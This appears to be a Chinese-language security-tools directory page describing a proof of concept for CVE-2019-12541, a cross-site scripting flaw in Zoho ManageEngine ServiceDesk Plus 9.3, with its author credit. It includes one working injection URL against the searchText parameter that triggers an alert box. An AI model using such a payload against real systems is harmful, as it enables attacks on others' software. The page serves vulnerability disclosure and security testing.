黑客、渗透测试和网络安全工具,武装您的安全武器库!
针对CVE-2019-12541的概念验证:Zoho ManageEngine ServiceDesk Plus 9.3中通过SolutionSearch.do的searchText参数存在存储型XSS漏洞。包含用于安全测试的payload。
发现我们社区最常用的工具。
探索所有工具
浏览我们的工具集合
信息描述:在 Zoho ManageEngine ServiceDesk Plus 9.3 中发现了一个问题。存在通过 SolutionSearch.do 的 searchText 参数导致的 XSS。
作者: Concobe of Tarantula Team - VinCSS (a member of Vingroup)
domain/SolutionSearch.do?searchText=1'%3balert('XSS')%2f%2f&selectName=Solutions